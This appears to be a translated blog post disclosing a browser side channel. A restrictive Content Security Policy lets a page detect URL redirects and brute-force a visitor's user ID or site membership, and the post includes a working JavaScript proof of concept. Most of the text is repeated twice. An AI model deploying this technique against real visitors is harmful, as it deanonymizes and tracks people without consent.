Content Security Policy for evil
There is such a special header for the security of CSP websites.
CSP restricts the loading of any resources if they were not pre-approved in the header, that is, excellent protection against XSS. The attacker will not be able to load a third-party script, inline-scripts are also disabled ...
At the browser level, you can only allow specific URLs for download and others will be prohibited. In addition to the benefits, this mechanism can also bring harm - after all, the fact of blocking is detection! It remains only to figure out how to apply it.
')
We can find out whether a specific URL is redirected to another, and in some cases even calculate a specific URL by brute-force from 1 to a million, for example (more - it will take a long time)
Try the demo page.
The coolest thing about this bug is that it is impossible to fix it “correctly”. It is based on the detection of whether the resource was loaded or not, and the CSP task to block the resource, which prevents it from loading. The only solution I see is the “emulation” of onload events, you can try redirecting to data :, the URL as it did with my similar bug in XSS Auditor (interesting bug by the way, and still not fixed).
At the moment, no protection has been entered, which means we will be able to detect the user ID on many resources for a long time and whether it is a user of SomeSite. It works in Firefox, Safari and Chrome, support in IE is very limited but they will fix it soon.
CSP restricts the loading of any resources if they were not pre-approved in the header, that is, excellent protection against XSS. The attacker will not be able to load a third-party script, inline-scripts are also disabled ...
At the browser level, you can only allow specific URLs for download and others will be prohibited. In addition to the benefits, this mechanism can also bring harm - after all, the fact of blocking is detection! It remains only to figure out how to apply it.
')
function does_redirect(url, cb){ var allowed = url.split('?')[0]; var frame = document.getElementById('playground'); window.cb = cb; window.tm = setTimeout(function(){ window.cb(false); },3000); frame.src = 'data:text/html,<meta http-equiv="Content-Security-Policy" content="img-src '+allowed+';"><img src="'+url+'" onerror=parent.postMessage(1,"*") onload=parent.postMessage(2,"*")>' } We can find out whether a specific URL is redirected to another, and in some cases even calculate a specific URL by brute-force from 1 to a million, for example (more - it will take a long time)
Try the demo page.
The coolest thing about this bug is that it is impossible to fix it “correctly”. It is based on the detection of whether the resource was loaded or not, and the CSP task to block the resource, which prevents it from loading. The only solution I see is the “emulation” of onload events, you can try redirecting to data :, the URL as it did with my similar bug in XSS Auditor (interesting bug by the way, and still not fixed).
At the moment, no protection has been entered, which means we will be able to detect the user ID on many resources for a long time and whether it is a user of SomeSite. It works in Firefox, Safari and Chrome, support in IE is very limited but they will fix it soon.
Source: https://habr.com/ru/post/211370/
All Articles